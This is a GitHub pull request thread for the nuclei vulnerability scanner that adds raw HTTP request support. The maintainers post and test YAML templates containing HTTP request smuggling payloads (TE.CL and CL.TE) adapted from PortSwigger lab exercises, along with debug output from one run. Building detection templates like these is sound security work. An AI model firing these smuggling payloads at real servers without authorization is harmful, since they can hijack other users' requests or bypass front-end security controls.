Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Full Raw Http support #329

Merged
merged 10 commits into from
Oct 6, 2020
Merged

Full Raw Http support #329

merged 10 commits into from
Oct 6, 2020

Conversation

Mzack9999
Copy link
Member

No description provided.

@Mzack9999 Mzack9999 added the Type: Enhancement Most issues will probably ask for additions or changes. label Sep 27, 2020
@Mzack9999 Mzack9999 self-assigned this Sep 27, 2020
@Mzack9999 Mzack9999 marked this pull request as draft September 27, 2020 00:27
@Mzack9999 Mzack9999 linked an issue Sep 28, 2020 that may be closed by this pull request
[feature] Headers missing or modified from raw request #256
Closed
@Mzack9999 Mzack9999 marked this pull request as ready for review September 29, 2020 20:14
@Mzack9999 Mzack9999 added Status: In Progress This issue is being worked on, and has someone assigned. Priority: Low This issue can probably be picked up by anyone looking to contribute to the project, as an entry fix labels Sep 29, 2020
@Mzack9999
Copy link
Member Author

Unsafe flag should address #226

@Mzack9999 Mzack9999 linked an issue Sep 29, 2020 that may be closed by this pull request
[issue] Connection header update and duplicate issue #226
Closed
@Mzack9999 Mzack9999 changed the title wip rawhttp Full Raw Http support Sep 29, 2020
@Mzack9999 Mzack9999 mentioned this pull request Oct 1, 2020
Merged
@ehsandeep
Copy link
Member

@Mzack9999 I see "in progress" label, is this ready for review? also need to rebase with the master,

Can you also include an example template to invoke RAW HTTP support within the template?

@Mzack9999 Mzack9999 removed the Status: In Progress This issue is being worked on, and has someone assigned. label Oct 3, 2020
@Mzack9999
Copy link
Member Author

Mzack9999 commented Oct 3, 2020
edited
Loading

Taking example from https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-te-cl-via-differential-responses

id: TE.CL-http-smuggling

info:
  name: smuggling via differential responses
  author: pdteam
  severity: info

requests:
  - raw:
      - |
        POST /search HTTP/1.1
        Host: vulnerable-website.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 4
        Transfer-Encoding: chunked

        7c
        GET /404 HTTP/1.1
        Host: vulnerable-website.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 144

        x=
        0

    unsafe: true
    matchers:
       # The second request should receive an HTTP 404 response (unsure if actually nuclei can handle it)
      - type: dsl
        dsl:
          - 'contains(all_headers, "HTTP/1.1 404")'

@ehsandeep
Copy link
Member 

Already on 'feature-raw-requests'
Your branch is up to date with 'origin/feature-raw-requests'.
Already up to date.

@Mzack9999 I've used the following template:-

id: TE.CL-http-smuggling

info:
  name: smuggling via differential responses
  author: pdteam
  severity: info

requests:
  - raw:
      - |
        POST /search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 4
        Transfer-Encoding: chunked

        7c
        GET /404 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 144

        x=
        0

    matchers:
       # The second request should receive an HTTP 404 response (unsure if actually nuclei can handle it)
      - type: word
        words:
          - 'HTTP/1.1 404'
        part: header
echo https://vulnerable-website.com | ./nuclei -t test.yaml -debug

POST /search HTTP/1.1
Host: vulnerable-website.com
+ Connection: close
+ Connection: close
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
User-Agent: Nuclei - Open-source project (github.com/projectdiscovery/nuclei)

[INF] Dumped HTTP response for https://vulnerable-website.com (TE.CL-http-smuggling)

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 285
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Oct 2020 08:20:09 GMT
Server: Apache/2.4.41 (Ubuntu)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at vulnerable-website.com Port 443</address>
</body></html>
  1. Notice two Connection header in 1st request, not defined in the template.
  2. Nuclei does not support a string match in response status code.

@ehsandeep ehsandeep added the Status: Revision Needed Submitter of PR needs to revise the PR related to the issue. label Oct 4, 2020
@Mzack9999 Mzack9999 removed the Status: Revision Needed Submitter of PR needs to revise the PR related to the issue. label Oct 5, 2020
@Mzack9999
Copy link
Member Author

Working template for HTTP request smuggling (TE.CL vulnerability)

id: TE.CL-http-smuggling

info:
  name: HTTP request smuggling - basic CL.TE vulnerability
  author: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
  severity: info

requests:
  - raw:
    - |
      POST / HTTP/1.1
      Host: your-lab-id.web-security-academy.net
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked
      
      0
      
      G
    - |
      POST / HTTP/1.1
      Host: your-lab-id.web-security-academy.net
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked
      
      0
      
      G
      
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Unrecognized method GPOST")'

@ehsandeep ehsandeep linked an issue Oct 5, 2020 that may be closed by this pull request
[Feature] Check if web server is smuggable #342
Closed
1 task
@Mzack9999 Mzack9999 merged commit e765b29 into master Oct 6, 2020
@Mzack9999 Mzack9999 deleted the feature-raw-requests branch October 6, 2020 18:05
@ehsandeep ehsandeep mentioned this pull request Oct 7, 2020
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@Mzack9999 Mzack9999

Labels
Priority: Low This issue can probably be picked up by anyone looking to contribute to the project, as an entry fix Type: Enhancement Most issues will probably ask for additions or changes.
Projects
None yet
Milestone
No milestone
2 participants
@Mzack9999 @ehsandeep